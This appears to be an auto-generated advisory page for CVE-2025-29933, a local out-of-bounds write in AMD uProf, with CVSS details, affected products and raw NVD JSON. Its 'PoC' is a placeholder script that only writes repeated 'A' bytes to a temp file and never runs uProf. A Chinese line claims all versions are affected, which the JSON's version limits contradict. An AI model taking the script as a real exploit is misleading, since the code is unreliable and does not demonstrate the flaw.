Security Vulnerability Report
中文
CVE-2025-29933 CVSS 5.5 MEDIUM

CVE-2025-29933

Published: 2025-11-24 21:16:03
Last Modified: 2025-11-26 18:49:48

Description

Improper input validation within AMD uProf can allow a local attacker to write out of bounds, potentially resulting in a crash or denial of service

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:amd:uprof:*:*:*:*:*:windows:*:* - VULNERABLE
cpe:2.3:a:amd:uprof:*:*:*:*:*:freebsd:*:* - VULNERABLE
cpe:2.3:a:amd:uprof:*:*:*:*:*:linux:*:* - VULNERABLE
AMD uProf 全部版本(具体受影响版本需参考AMD官方公告AMD-SB-9019)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-29933 PoC - AMD uProf Input Validation Issue # This is a conceptual proof of concept demonstrating the vulnerability # Note: Actual exploitation requires specific conditions and AMD uProf environment import struct import os import sys def create_malicious_input(): """ Create a malicious input file that may trigger the input validation issue in AMD uProf, causing out-of-bounds write. The vulnerability exists due to improper input validation in AMD uProf when processing certain input data structures. """ # Crafting a payload that exceeds expected buffer boundaries # The exact format depends on the specific uProf component being exploited # Header with oversized data field payload = bytearray() # Craft malformed input data # This would be specific to the vulnerable uProf component malformed_data = b'A' * 1024 # Excessive length data payload.extend(malformed_data) return bytes(payload) def trigger_vulnerability(input_file): """ Attempt to trigger the vulnerability by providing malformed input to AMD uProf components. """ try: # Write malicious input to file with open(input_file, 'wb') as f: f.write(create_malicious_input()) print(f"[+] Malicious input written to {input_file}") print("[+] This input may trigger OOB write in vulnerable AMD uProf") print("[+] Expected result: Process crash or denial of service") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": print("CVE-2025-29933 PoC - AMD uProf Input Validation Bypass") print("=" * 60) print("Target: AMD uProf (improper input validation)") print("Impact: Out-of-bounds write leading to DoS") print("=" * 60) # Create temporary input file temp_file = "/tmp/cve202529933_input.bin" trigger_vulnerability(temp_file) print("\n[!] Note: This PoC is for educational purposes only.") print("[!] Always test in controlled environments with proper authorization.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-29933", "sourceIdentifier": "[email protected]", "published": "2025-11-24T21:16:02.583", "lastModified": "2025-11-26T18:49:47.770", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper input validation within AMD uProf can allow a local attacker to write out of bounds, potentially resulting in a crash or denial of service"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:amd:uprof:*:*:*:*:*:windows:*:*", "versionEndExcluding": "5.1.576", "matchCriteriaId": "1C0E8173-7D09-486D-B230-6512634631A1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:amd:uprof:*:*:*:*:*:freebsd:*:*", "versionEndExcluding": "5.1.663", "matchCriteriaId": "690D35FB-BD7E-4E0E-B054-32DBB85E2181"}, {"vulnerable": true, "criteria": "cpe:2.3:a:amd:uprof:*:*:*:*:*:linux:*:*", "versionEndExcluding": "5.1.701", "matchCriteriaId": "6F67E8F1-4D02-48AA-9A7E-7637C2E953FB"}]}]}], "references": [{"url": "https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-9019.html", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}